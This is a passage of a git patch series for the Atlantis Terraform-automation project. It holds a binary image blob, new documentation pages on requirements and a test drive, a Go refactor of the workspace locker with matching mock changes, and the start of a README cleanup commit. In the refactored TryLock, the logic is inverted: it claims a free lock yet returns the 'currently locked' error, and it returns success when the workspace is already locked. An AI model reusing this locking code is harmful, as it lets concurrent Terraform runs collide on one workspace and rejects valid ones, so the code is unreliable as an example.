z!}(9&TNDnS*uC)JQ-sqwzn=bJRkcA@o7TkC)l-f|plaY9T4u?p4Lrs?J0tSh&3bQ)
zvDlBC2R6@UE*Tq|U|F4tQDcM>NXeWbE;qCHnNINw)0zmQ*yQ-vEc2s<rs98@+Ud2h
zh;KfReBo}N9ma#~gLQ;wJGsQ9HnMQ^w+W?6I(xJbtJgdgZ0pIM6a0%WvPbD)EWHSD
z#$-INm4?gBq;1xqOnqFN*riLXtdAP4BF3chz07^lwAxuuhfz)6K~6L#vr4Nb@txnF
z15A;xJa<F3hN2?VO;SXSe31wfd(OvUH&LI$X1S~c_y<IQoL#4xm~&1Ob}vR>&gJRl
z#V_h>UsEe?4R_+rm4vl6`(;klTq{$}`w&(9z17ege1)KM-st9FqzMJH5w~=b=gSK=
zAI&((y+k*<Q+TpyyV6N(C!u4DKQq*k$JbKhIaxTIVv?ViwBFk!S#>$gR#;dx?3_+H
z<IXpT?cPd=G_uxE%bROYAViL=@sG&=<xYE*eTCccCrHTgXS8FHx2;X6&)Asn1$Ww{
zl~p8UqU!N3)nsW_*2H+cwcd3X8bh9WEP17I0RHS%CcobPnwi~GAp2?@pLB&W3p+$C
zb?6?W%oCyMT`KTT5pMzWj)@LDB%m2bvADq_sG$lqgKG%OxEhO`1W-#+I@A<0GoaBY
zlR?a}!-bhfrJKdwiRi~-ri5zML9PkX6A(gYAE@uyh{R-0=EI6tr+9c`9Q5C%_h%C_
zbmPA3coaGJnP5t)cDt?D(=yDjOk#vm{N1ZgT}3b=3n7bBSJ>>|=FT|}B%+?bZ_HgS
z>Dl6e%qBz}{k<TIf7TQ|=yZ&Bnu{Y~QFZL5_#D5{pLwKLL^5szHBtM?llCNDuzcz%
ztbJ`U>0XYk1V~kuVyjWs+%Mfzhv=HwST}@VG}eK~-ccMnsZ+LV!+8t7lwK;oQONu8
z^JlnndU2?@Or~q%CwU$VcoEHXYm+j`bDKyKD_wi_v-gnhO8D=<$|{i7ququ!-VG?<
zt&$7mq+hUUX?2*E#Y{0hLRjj4MBeNQ9Rc+vz4Iu^qxUGf;`Z)O3$9CdBCfl9ylCcq
zt8F~ea%R1&XEhr+ZXss3<!(A;7Xr6W)z?sd9LLK@d(l@FOcvN+iMmVp=oyRBcNn;N
zI&ny&*@&RgjF!Ob!Q0C;gKjJ2?m`Wn2w7{HPW_F{s4g|O&-(pd*rA$J$>w}jX^?xC
zMGnPL?TMM(v_cW~OLKk8;JVD;Ec?!EeKqzdNDsjhhC;r#PI1JSRF_N%jO0(e<850F
zWEz-l7YPq+eYBMLDY%7ai@cyvledmIGw+I88QQU5@|ePgHhbCR6cOU&i&`DhTf-8H
zw}##PMWvSu!Px~;pLM8#maq}3{CGSc-M|lJs<R?uMTIXe_e9mSg1uGT8RZ*u(VkX?
zw0TxfuU&$Cb|DQWK);6WNlE176<+Nw)Y<*4w98U=*|hpj>3aF2Tnd!iR#na8hkUm9
zJ18-@gw!qK&R+KPn-1@F;W8e#hNOC8i5%iB7ejAp?7Nmq#{5(ksmkNSanCgBjVh20
ze{>wFEo^AVHwnHjv(GOb5s8KPFF`$y|1?+iL)@b!t*lLhI@0PMRydVt=<eWGYCu|-
zc3dhn+LlFZ7!#aruBF{K9Lkav?dW$U%*juGQRUsrJo=*jSz8swxq7kfsg&2;FZp8A
zwiHaulmltIm`mf?Y;TKZCR{W9@p4=2rVzAFKaiN+!U#(<?i{^*O}rR_o+tYDXVVvg
zGcvC{w1Sp=FIbXN!}1J&H$E9aC$o|?9Mkqb5)*a$<e4^9t4#dvkbaQAcyPJ$19r~*
zz^eUBJr$=t8qBX|1IN=^6KCt}4U4WP>$e{j6C*rIoeU8?FL%nb*d=baz|%3b<k)DQ
zYQ7<;B%|fENOKXAb6c}QT=ip*m}%mM0=Tk(ut{|8ZCYW4;1XeNj!V+&j7u0Yno_B;
z3g!D<@pF2;2APBA8>bl}%h9Dg^c$Ovsu0N|BeYdXiU-sd$wm9?c9(y^WFac`jo`^Y
z`Xe+gyUlTw9CM)FkPFiLrR;8S<+y6Sh|GoLvo3E|R$D8r`$UP|EPP9=Z$I=Ggx6P=
z0=0`A1J6c<Ev$DRu`<6v@`LqAeG_bI(e_vlI!%&eSn?!YX!<YhiL=Rffo1b;H-)-~
z*i+tm1$EE?yP{JMuAyI6V!dbi1fcJEn38pNCImc^FIu>{wjG6%J0=T7?S_^6JxtMq
zI{MhqhoI?5$j6<rnaeeyKMJKOXeQpy%lI4;sW=wa7Vssh7Niw%Oq6Zt?yECO9d+ut
z1HnC&73<u2#MCW)seai`iGfiTM>Jn9XmqVlv=Y~-%a3UnAKnn}wZ0%~pT0Px?i~L)
z@kPh`O6ccyUh0xKX;9)(``{LGtEaAHU5@HG;(6bw1KVBtb{(=5Kd8@%3+rba{+2cT
zq%x|M_LnqeR8u-Bl~9Te)h~u|32zbxp!oTU_0RNP(o;wGNA%Pl=}>UvV~t}9BNKS~
zHZx~ENQOs^0jGPVB$E6S!&e{2&7BJ+A(A|c+)y?s%M61oZCrf1D19LdxRb1dzE^4&
zZN7nRv-p#*>VD8q3YBW)i0S~9tae^9_57}gUsQJMloOA85rs5W_Kdh!@bvX@vl}gz
z^;CSa|MChb?d4>2@**ggS5fOy5hhgP<W<N-jn(7M+9=@U6#<`Zb)<1Tiu!h$Xx-@{
zZ`+wH7EgO?v2)eODRF|##!T!EN&dh!T>3V1dZBKrk(uMOv>p)y+Rgtq(C?Js$hRVh
zx>q9BVo2_bSy_#_roI&4DXi)Tge<m=Yl*EC1b5Dq?AQ%CzA-;Hn499XGe9A?K<(_c
zUEnhoGG*Q$B+C{+T*@yKuv`@7j{X>K)}G5F1c#MoHtFff@ZwQaieexG)4IGcyNi;t
zYeZn8TUCL0*3M>v2ZbC>pvS0F&R-448!>So%zNXWw-aXIeCb3rG#JyyQeGD&TQDd!
z`jt{g0&NEGJS?{<=4wyGm7d%Y_!;Yw92%=c@)lo}mE5=<D)^$N0zRT=!#6OqQ(kC3
z=}CIWld4DqZ#yo-Jm-{m)gaPOXGG+4I?gqVQNf9|H}xc=vex^)3Mp+`Ebpr=`>03)
zbS5cIFEOGFj~@e$Mmov)UgVa`kco4g^4s0Vp(|1gVd<hmPlz9#9~Cz<Pp2;)gEL-p
z-Mv5=-_`fabyQ$x6a36*LDf=TB<Tv?F>LK(0-knlapW8U>v?>KyY^-NJdRz)@tiOV
zK4&^8Aq&AAk3u^Nw%456TK{p87G&6u(48KR9XRDZRckmheKk?hj9b}^y&&3GUp|lJ
z-7(-*fy}-eilz7*BaOr?f^rdsN}j1LCU@C4jS<jYLV@mZ;9;eD)@Ov%T5Eh!*+}|Y
zu3VqH-^T#?DHEM2NRQ+O*7E)GW>T`raXSTe8pTF0x`i&1+xF6}o_+hpRT*6h;hZJn
zFLtll8@`Mf>qY#YKuFCi+Z0DF_M!qB!{-DZB)m3&k{f@o6ctDD;V|<!KEWzYbcot+
zH{s;!5}t?BYFv4V^bYH-4(%_-!I|RkQ?|@Pz32Q*$g`~)^6=FiUJ`LJ8IAM~hID#a
zZXR#*1+6gb4?HX<5P0&A3lp4LQ9$wq7hOLW1B6{d3=a=wBrbE++&HpZvfJsyQ|bo^
z3=TJ#I1|SKva$A<BZ}#BG74ph5z#DE&s>9*CQ{W6=&{$9)CtD>(bCI_MI`AfZnk-?
zH-A}nH@Nu`8!e2Mu!2ats43JsrZ%{jEFqqNtg+Ro_xnLhCAO`KTmA8ph$6kH1|d>%
zyf<MqzR{)yTZiTV(>~ZY|2hh5fg>1}Gs`c-Hy*X(-b3^vQrNay5lkI7QyEDYX>UU=
zO?x>MGBzr2XPuN`v}I?hnHS;PgbzJRBbZU8SZW4F*#@tdo3#)T+8d+FKbonFd|q=m
zW@IbYu`RGC10{8`oMXnb(;fD!A8(^$cPB`{O9l(zUl%Ec)ld4&LjR;~e4lKo>0bF@
zI~&@!u8R=$)pi2|^>t^q5tpy`&UARI=y}@^A1_|Nr{83r(vQx3IP{o061)CtWquo6
z@hjwp{MD8fU$Q1<v~q)M$3A;ye#36M49te8SX<eUw(hrF_0YBnef+(!(*P`LF8?&G
zo%fIJ5x8ZFd!L#va_$(iriZ7mRKsH^3L6$Ah`S%X(Q{>ECo#&nuOiVi(z$v<b0Gyi
zeH(=W>!U3{uSJGw=T#NV*L)3{&8n$8x)V`v^U8B4M09Q3NJ3BVOm}Z}hdr;-G94_#
zYSPTAkn3(@vM9~?k2J@mcJr`q%vXu~i_S9D=jPHLStfBmQ_3x+-{H>6?CB?(DLqsK
z1&-vorjEwlH0{`S3l&33>>_L?ckk7f&v7K+qeVjN(>(Uw<vZ^JJF_;1#O6|6?Af~6
zrlsrW1_3t<HICu&oQ{K3Oz#x8x9|o@)<pkgK127@Z)Io{ZUIU}jFxH=Wa=ys%5I~2
zD=6n{3b_dz3aB|vfu_Z<AxnBtiGfWd+-+JOtXCD@(qd3httM_N_mw98F^(L{%#nU>
zQskRhiA)j1k?;@{zLoINr_D}&xqt&QWSGv+=a$p@!vHj`&Cied=D0SG8feb2)!`fb
zj(V1}Tq%$N7I0+E(9CeQ|E&>c9g&^YoY35?tdhM^V2mNpj~bUZ=P%pbgcPGJ6xI1N
zUGDz|PfproWZi9^#n*Ay-^##{tDFCV03{e>kMfd+UhrgZX*;-le7^a|j}oe}^3eOI
zu+riOrt=mBe-$7uLu<=s;n64dZ+ae>0VRiTsH3r|TR#92S0F$T04Nj{0C%EdETSjQ
zUmCmN?icWS1mWJ8H97RlE3=e|RqrkPi8EC{)yEVoYdOuTyzSw|dFiLM`Glo>B})$^
z^(RRHJFAL-&8n_r?{8?iM7(z5>;&KZQO@#;Q&_Iav8B{*Jcz8=5l3wb^_M64p{X7j
zsu7*T)pa}j_h@_Fzc&WP9D|Sr6QZ(I)#6=c?-XyV)(e_8Q46?h`b|tzus6dcO76DD
zp9>o7)*hV<2RPV;vSqUS&z*qsi%J2&5fetRHCa(laE#~alhWQRYq@|4d8ul(FBdZ9
z?=-Cc;)dw=(-ZKGM{E4g)?KUnuj8wKRdGVE0cTj7ShIXqV5agu<4e}?h_Q!@*RIqK
zs58Hg#b9L<@!HccsE{kvFMyrZ;y~(lXByzdq0K+OkuCs)Y$431yr_a!T8T*5Me(5|
zBS=R8R>Auj;=Gyik_u)kN@|%H_kS4Bucfnf=}+{7n7V+tkYHd6qhmY(kRx>Yz)C4N
z^omjTZGaHU6)(4QN%BH<<JBX$4DhEVN;HxD^BCDcAhiNSxJ-0^qPerWw0@s_uNa~C
zcA@<crn%2qU!w0tKwx3#x_q2?T~X1TXSO}Ud&2r_*d6nYfj*PU>hsG?)J^B;67kiU
z@}Qx{X5;(0d58|d`9aRiKQE9VTL+V&KkmsBVsgR~1382n^epFebyM2zELmEIw}C&E
zj_>icJf+>eRVvI^D^vww-r?(a*a&QODCOy{nA3Gm45cSJ4)QN{J1@Y9jk1%kVF1yt
z_vjxuA<(Za9vR7VUa7y9NKr=fU4GJpwO-}g9(f|mtBNV+&1re}5}p%A{8ajcms+O9
zt?uIiGeMl^<qA*F`O@#ZCI0>M2|(awS2vRo*z@KBos=r_Rkw*O*M~+)V=PP1+_diI
zadVTBnum$d;q-d(%A#zqQe3)+xMVM^)=-}0<Fq!9HyK$mO^3X>Tj@N{0rnZodRo+^
z#&8&Qwt9~`8(OaZ3Hbi=#I*w_u5!dzjtemVuXgSJjMKuxjvd_+2a`m#GysU6&h^Pb
zIe`#_v-hbVXrZGFW`Ijeu%Kl^fy?&Dxp5!dol4S;J+i6#JIA@mBdYZl&!7KwpmUx$
z+nKeO=$jK`Wkt2L+Pran`-`amj;x4JK(mlRD3iIPUqHZul34hE@#X&Y$IE-9xhDdG
zY;7W1!9f;DtOs`o$Pj?>k)|7rLjkjO27fX;d9YR4gY$ujzV$8l(ggsDy;yaa-l!oH
zXjip<mt)|~*>fSFXzYG^#J^XxD&4?3R@gkc5#<jgsM_$fbBEwE287p=&JzA9FmGLr
zw$S}Y3xDTj-{U~Sllm0FJeLjNJo@^%(jonIdhOwCn^*t`_~nB+xSt0D6X63iW5U~q
zSlIXl+*(v69fET@AR&pkQ!OA00dW2hmc)B-cRnhLdpP?xTn+_@ot<T9vr~uRi~;bw
z3M+qc3&1(}>VNI}|1o#NUOTfFI<7{q&z>u%M)x0rv+EwtMyQLo9D#eu@b(X;`<7z+
z))@cUV|*^~;S@GA^GfKRtJR|@^rZa(2vVd-XUZS_t>)@Jaj=_fodyQ`$L!2Y2duKz
zBS2XAGJ^|tm@<Ps`0N-1QxnqjvLwfO{F326wC2Mi_y1kZBdTS`^}_iuLEIc5h^tr1
zzYlmY1JkLl)T@U%UeTThliNn_0=ErI`h$T~Ir|*&6AoPNdn^{v9Q8y>?caF(?KThg
zM3KkjZ;r-lMX*B^)sTn9#SC!OF36^^2Jn5uZ}L#x91C#WCqB(0jzGMnjRfsqPyN%q
z@5?<MA#PObT?M=FXD!X1y9ZB1>m=Y2pJy5y92iv9o~&^fAFOoq?FG`Z*8DCss-II>
ziWww(aI>Qf>;Kj;T<ZOsTy==hjot1)Cygo*UviHgVvC49(LqR$k+!}*Fv{6Gyng?L
z)&E|<Tn0pu5p)UsP+eiI;8MY4rNg4z-S^RPCYq3H=1k|eS8BX~!uN>wZSbuewa0${
E1A--qssI20

literal 0
HcmV?d00001

diff --git a/runatlantis.io/guide/requirements.md b/runatlantis.io/guide/requirements.md
new file mode 100644
index 0000000000..5741408afb
--- /dev/null
+++ b/runatlantis.io/guide/requirements.md
@@ -0,0 +1,83 @@
+# Requirements
+
+[[toc]]
+
+## Git Host
+* GitHub (public, private or enterprise)
+* GitLab (public, private or enterprise)
+
+If you would like support for BitBucket, please add a :+1: to [this ticket](https://github.com/runatlantis/atlantis/issues/30)
+and click "Subscribe" to be notified when support is available.
+
+## Remote State
+Atlantis supports all remote state backends. It **does not** support local state
+because it does not commit the modified state files back to version control.
+
+## Repository Structure
+Atlantis supports any Terraform project structures, for example:
+
+### Single Terraform project at repo root
+```
+.
+├── main.tf
+└── ...
+```
+
+### Multiple project folders
+```
+.
+├── project1
+│   ├── main.tf
+|   └── ...
+└── project2
+    ├── main.tf
+    └── ...
+```
+
+### Modules
+```
+.
+├── project1
+│   ├── main.tf
+|   └── ...
+└── modules
+    └── module1
+        ├── main.tf
+        └── ...
+```
+With modules, if you want `project1` automatically planned when `module1` is modified
+you need to create an `atlantis.yaml` file. See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html) for more details.
+
+###  Terraform Workspaces
+This refers to [Terraform Workspaces](https://www.terraform.io/docs/state/workspaces.html). You need
+to tell Atlantis the names of your workspaces with an `atlantis.yaml` file. See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html).
+
+### .tfvars Files
+```
+.
+├── production.tfvars
+│── staging.tfvars
+└── main.tf
+```
+With .tfvars files, for Atlantis to be able to plan automatically, you need to create
+an `atlantis.yaml` file to tell it to use `-var-file`.
+See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html) for more details.
+
+## Terraform Workspaces
+Terraform introduced [Workspaces](https://www.terraform.io/docs/state/workspaces.html) in Terraform v0.9. They allow for
+> a single directory of Terraform configuration to be used to manage multiple distinct sets of infrastructure resources
+
+If you're using a Terraform version >= 0.9.0, Atlantis supports workspaces through an
+`atlantis.yaml` file that tells Atlantis the names of your workspaces or through the
+the `-w` flag. For example:
+```
+atlantis plan -w staging
+```
+
+## Terraform Versions
+By default, Atlantis will use the `terraform` executable that is in its path.
+To use a specific version of Terraform:
+1. Install the desired version of Terraform into the `$PATH` of where Atlantis is
+ running and name it `terraform{version}`, ex. `terraform0.8.8`.
+2. Create an `atlantis.yaml` file for your repo and set the `terraform_version` key.
+See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html) for more details.
diff --git a/runatlantis.io/guide/test-drive.md b/runatlantis.io/guide/test-drive.md
new file mode 100644
index 0000000000..2b7b884b95
--- /dev/null
+++ b/runatlantis.io/guide/test-drive.md
@@ -0,0 +1,18 @@
+# Test Drive
+To try out running Atlantis yourself first, download the latest release for your architecture:
+[https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases)
+
+Once you've extracted the archive, run:
+```bash
+./atlantis testdrive
+```
+
+This mode sets up Atlantis on a test repo so you can try it out. It will
+- fork an example terraform project into your GitHub account
+- install terraform (if not already in your PATH)
+- install ngrok so we can expose Atlantis to GitHub
+- start Atlantis so you can execute commands on the pull request
+
+## Next Steps
+
+When you're ready to try out Atlantis on your own repos then read [Getting Started](getting-started.html).
diff --git a/server/events/atlantis_workspace_locker.go b/server/events/atlantis_workspace_locker.go
index cc86db42c7..b1a3338718 100644
--- a/server/events/atlantis_workspace_locker.go
+++ b/server/events/atlantis_workspace_locker.go
@@ -29,9 +29,10 @@ import (
 // Terraform concept of workspaces, not directories on disk managed by Atlantis.
 type AtlantisWorkspaceLocker interface {
 	// TryLock tries to acquire a lock for this repo, workspace and pull.
-	TryLock(repoFullName string, workspace string, pullNum int) bool
-	// TryLock2 tries to acquire a lock for this repo, workspace and pull.
-	TryLock2(repoFullName string, workspace string, pullNum int) (func(), error)
+	// It returns a function that should be used to unlock the workspace and
+	// an error if the workspace is already locked. The error is expected to
+	// be printed to the pull request.
+	TryLock(repoFullName string, workspace string, pullNum int) (func(), error)
 	// Unlock deletes the lock for this repo, workspace and pull. If there was no
 	// lock it will do nothing.
 	Unlock(repoFullName, workspace string, pullNum int)
@@ -50,29 +51,20 @@ func NewDefaultAtlantisWorkspaceLocker() *DefaultAtlantisWorkspaceLocker {
 	}
 }
 
-func (d *DefaultAtlantisWorkspaceLocker) TryLock2(repoFullName string, workspace string, pullNum int) (func(), error) {
-	if !d.TryLock(repoFullName, workspace, pullNum) {
-		return func() {}, fmt.Errorf("the %s workspace is currently locked by another"+
-			" command that is running for this pull request–"+
-			"wait until the previous command is complete and try again", workspace)
-	}
-	return func() {
-		d.Unlock(repoFullName, workspace, pullNum)
-	}, nil
-}
-
-// TryLock returns true if a lock is acquired for this repo, pull and workspace and
-// false otherwise.
-func (d *DefaultAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) bool {
+func (d *DefaultAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) (func(), error) {
 	d.mutex.Lock()
 	defer d.mutex.Unlock()
 
 	key := d.key(repoFullName, workspace, pullNum)
 	if _, ok := d.locks[key]; !ok {
 		d.locks[key] = true
-		return true
+		return func() {}, fmt.Errorf("the %s workspace is currently locked by another"+
+			" command that is running for this pull request–"+
+			"wait until the previous command is complete and try again", workspace)
 	}
-	return false
+	return func() {
+		d.Unlock(repoFullName, workspace, pullNum)
+	}, nil
 }
 
 // Unlock unlocks the repo, pull and workspace.
diff --git a/server/events/mocks/mock_atlantis_workspace_locker.go b/server/events/mocks/mock_atlantis_workspace_locker.go
index cd4236ced8..a60f86a1e9 100644
--- a/server/events/mocks/mock_atlantis_workspace_locker.go
+++ b/server/events/mocks/mock_atlantis_workspace_locker.go
@@ -17,21 +17,9 @@ func NewMockAtlantisWorkspaceLocker() *MockAtlantisWorkspaceLocker {
 	return &MockAtlantisWorkspaceLocker{fail: pegomock.GlobalFailHandler}
 }
 
-func (mock *MockAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) bool {
+func (mock *MockAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) (func(), error) {
 	params := []pegomock.Param{repoFullName, workspace, pullNum}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock", params, []reflect.Type{reflect.TypeOf((*bool)(nil)).Elem()})
-	var ret0 bool
-	if len(result) != 0 {
-		if result[0] != nil {
-			ret0 = result[0].(bool)
-		}
-	}
-	return ret0
-}
-
-func (mock *MockAtlantisWorkspaceLocker) TryLock2(repoFullName string, workspace string, pullNum int) (func(), error) {
-	params := []pegomock.Param{repoFullName, workspace, pullNum}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock2", params, []reflect.Type{reflect.TypeOf((*func())(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock", params, []reflect.Type{reflect.TypeOf((*func())(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
 	var ret0 func()
 	var ret1 error
 	if len(result) != 0 {
@@ -103,41 +91,6 @@ func (c *AtlantisWorkspaceLocker_TryLock_OngoingVerification) GetAllCapturedArgu
 	return
 }
 
-func (verifier *VerifierAtlantisWorkspaceLocker) TryLock2(repoFullName string, workspace string, pullNum int) *AtlantisWorkspaceLocker_TryLock2_OngoingVerification {
-	params := []pegomock.Param{repoFullName, workspace, pullNum}
-	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "TryLock2", params)
-	return &AtlantisWorkspaceLocker_TryLock2_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type AtlantisWorkspaceLocker_TryLock2_OngoingVerification struct {
-	mock              *MockAtlantisWorkspaceLocker
-	methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *AtlantisWorkspaceLocker_TryLock2_OngoingVerification) GetCapturedArguments() (string, string, int) {
-	repoFullName, workspace, pullNum := c.GetAllCapturedArguments()
-	return repoFullName[len(repoFullName)-1], workspace[len(workspace)-1], pullNum[len(pullNum)-1]
-}
-
-func (c *AtlantisWorkspaceLocker_TryLock2_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) {
-	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
-	if len(params) > 0 {
-		_param0 = make([]string, len(params[0]))
-		for u, param := range params[0] {
-			_param0[u] = param.(string)
-		}
-		_param1 = make([]string, len(params[1]))
-		for u, param := range params[1] {
-			_param1[u] = param.(string)
-		}
-		_param2 = make([]int, len(params[2]))
-		for u, param := range params[2] {
-			_param2[u] = param.(int)
-		}
-	}
-	return
-}
-
 func (verifier *VerifierAtlantisWorkspaceLocker) Unlock(repoFullName string, workspace string, pullNum int) *AtlantisWorkspaceLocker_Unlock_OngoingVerification {
 	params := []pegomock.Param{repoFullName, workspace, pullNum}
 	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Unlock", params)
diff --git a/server/events/project_command_builder.go b/server/events/project_command_builder.go
index 90f2324dd8..2c82a8724d 100644
--- a/server/events/project_command_builder.go
+++ b/server/events/project_command_builder.go
@@ -38,7 +38,7 @@ type TerraformExec interface {
 func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext) ([]models.ProjectCommandContext, error) {
 	// Need to lock the workspace we're about to clone to.
 	workspace := DefaultWorkspace
-	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, workspace, ctx.Pull.Num)
+	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock(ctx.BaseRepo.FullName, workspace, ctx.Pull.Num)
 	if err != nil {
 		return nil, err
 	}
@@ -130,7 +130,7 @@ func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext
 func (p *DefaultProjectCommandBuilder) BuildPlanCommand(ctx *CommandContext, cmd *CommentCommand) (models.ProjectCommandContext, error) {
 	var projCtx models.ProjectCommandContext
 
-	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, cmd.Workspace, ctx.Pull.Num)
+	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock(ctx.BaseRepo.FullName, cmd.Workspace, ctx.Pull.Num)
 	if err != nil {
 		return projCtx, err
 	}
diff --git a/server/events/project_command_runner.go b/server/events/project_command_runner.go
index 513a32fc1c..8a4e1c4aa4 100644
--- a/server/events/project_command_runner.go
+++ b/server/events/project_command_runner.go
@@ -69,7 +69,7 @@ func (p *ProjectCommandRunner) Plan(ctx models.ProjectCommandContext) ProjectCom
 	ctx.Log.Debug("acquired lock for project")
 
 	// Acquire internal lock for the directory we're going to operate in.
-	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num)
+	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num)
 	if err != nil {
 		return ProjectCommandResult{Error: err}
 	}
@@ -164,7 +164,7 @@ func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCo
 		}
 	}
 	// Acquire internal lock for the directory we're going to operate in.
-	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num)
+	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num)
 	if err != nil {
 		return ProjectCommandResult{Error: err}
 	}

From 1d2f33a47f6deac341786f813434807fbd8bc2bc Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Mon, 25 Jun 2018 13:25:05 +0100
Subject: [PATCH 48/69] Docs

---
 README.md                                     | 786 +-----------------
 docs/atlantis-logo.png                        | Bin 14750 -> 0 bytes
 docs/atlantis-plan.gif                        | Bin 1090754 -> 0 bytes
 docs/atlantis-walkthrough-icon.png            | Bin 79344 -> 0 bytes
 docs/pr-comment-apply.png                     | Bin 19474 -> 0 bytes
 docs/pr-comment-help.png                      | Bin 19736 -> 0 bytes
 docs/pr-comment-plan.png                      | Bin 19305 -> 0 bytes
 docs/status.png                               | Bin 45991 -> 0 bytes
 runatlantis.io/.vuepress/config.js            |   6 +-
 runatlantis.io/README.md                      |   8 +-
 runatlantis.io/docs/README.md                 |  20 +-
 runatlantis.io/docs/deployment.md             |  90 --
 runatlantis.io/docs/images/atlantis-logo.png  | Bin 14750 -> 0 bytes
 .../docs/images/atlantis-walkthrough-icon.png | Bin 79344 -> 0 bytes
 runatlantis.io/docs/images/lock-comment.png   | Bin 0 -> 60437 bytes
 .../docs/images/lock-delete-comment.png       | Bin 0 -> 65499 bytes
 runatlantis.io/docs/images/lock-detail-ui.png | Bin 0 -> 121724 bytes
 runatlantis.io/docs/images/locks-ui.png       | Bin 0 -> 78413 bytes
 runatlantis.io/docs/locking.md                |  66 ++
 runatlantis.io/docs/server-configuration.md   |  99 +++
 runatlantis.io/guide/README.md                |   1 -
 runatlantis.io/guide/images/atlantis-logo.png | Bin 14750 -> 0 bytes
 .../guide/images/pr-comment-apply.png         | Bin 19474 -> 0 bytes
 .../guide/images/pr-comment-help.png          | Bin 19736 -> 0 bytes
 .../guide/images/pr-comment-plan.png          | Bin 19305 -> 0 bytes
 runatlantis.io/guide/images/status.png        | Bin 45991 -> 0 bytes
 runatlantis.io/guide/requirements.md          |  29 +-
 27 files changed, 200 insertions(+), 905 deletions(-)
 delete mode 100644 docs/atlantis-logo.png
 delete mode 100644 docs/atlantis-plan.gif
 delete mode 100644 docs/atlantis-walkthrough-icon.png
 delete mode 100644 docs/pr-comment-apply.png
 delete mode 100644 docs/pr-comment-help.png
 delete mode 100644 docs/pr-comment-plan.png
 delete mode 100644 docs/status.png
 delete mode 100644 runatlantis.io/docs/images/atlantis-logo.png
 delete mode 100644 runatlantis.io/docs/images/atlantis-walkthrough-icon.png
 create mode 100644 runatlantis.io/docs/images/lock-comment.png
 create mode 100644 runatlantis.io/docs/images/lock-delete-comment.png
 create mode 100644 runatlantis.io/docs/images/lock-detail-ui.png
 create mode 100644 runatlantis.io/docs/images/locks-ui.png
 create mode 100644 runatlantis.io/docs/locking.md
 create mode 100644 runatlantis.io/docs/server-configuration.md
 delete mode 100644 runatlantis.io/guide/images/atlantis-logo.png
 delete mode 100644 runatlantis.io/guide/images/pr-comment-apply.png
 delete mode 100644 runatlantis.io/guide/images/pr-comment-help.png
 delete mode 100644 runatlantis.io/guide/images/pr-comment-plan.png
 delete mode 100644 runatlantis.io/guide/images/status.png

diff --git a/README.md b/README.md
index 9397f7a77a..7d669fa1ab 100644
--- a/README.md
+++ b/README.md
@@ -1,12 +1,12 @@
 # Atlantis
 
 <p align="center">
-  <img src="./docs/atlantis-logo.png" alt="Atlantis Logo"/><br><br>
-  A unified workflow for collaborating on Terraform through GitHub and GitLab
+  <img src="./runatlantis.io/.vuepress/public/hero.png" alt="Atlantis Logo"/><br><br>
+  Terraform Automation By Pull Request
 </p>
 
 ## Walkthrough Video
-[![Atlantis Walkthrough](./docs/atlantis-walkthrough-icon.png)](https://www.youtube.com/watch?v=TmIPWda0IKg)
+[![Atlantis Walkthrough](./runatlantis.io/guide/images/atlantis-walkthrough-icon.png)](https://www.youtube.com/watch?v=TmIPWda0IKg)
 
 Read about [Why We Built Atlantis](https://medium.com/runatlantis/introducing-atlantis-6570d6de7281)
 
@@ -15,785 +15,11 @@ Read about [Why We Built Atlantis](https://medium.com/runatlantis/introducing-at
 [![Slack Status](https://thawing-headland-22460.herokuapp.com/badge.svg)](https://thawing-headland-22460.herokuapp.com)
 [![Go Report Card](https://goreportcard.com/badge/github.com/runatlantis/atlantis)](https://goreportcard.com/report/github.com/runatlantis/atlantis)
 
-* [Features](#features)
-* [Atlantis Works With](#atlantis-works-with)
-* [Getting Started](#getting-started)
-* [Pull/Merge Request Commands](#pullmerge-request-commands)
-* [Project Structure](#project-structure)
-* [Workspaces/Environments](#workspacesenvironments)
-* [Terraform Versions](#terraform-versions)
-* [Project-Specific Customization](#project-specific-customization)
-* [Locking](#locking)
-* [Approvals](#approvals)
-* [Security](#security)
-* [Production-Ready Deployment](#production-ready-deployment)
-    * [Docker](#docker)
-    * [Kubernetes](#kubernetes)
-    * [AWS Fargate](#aws-fargate)
-* [Server Configuration](#server-configuration)
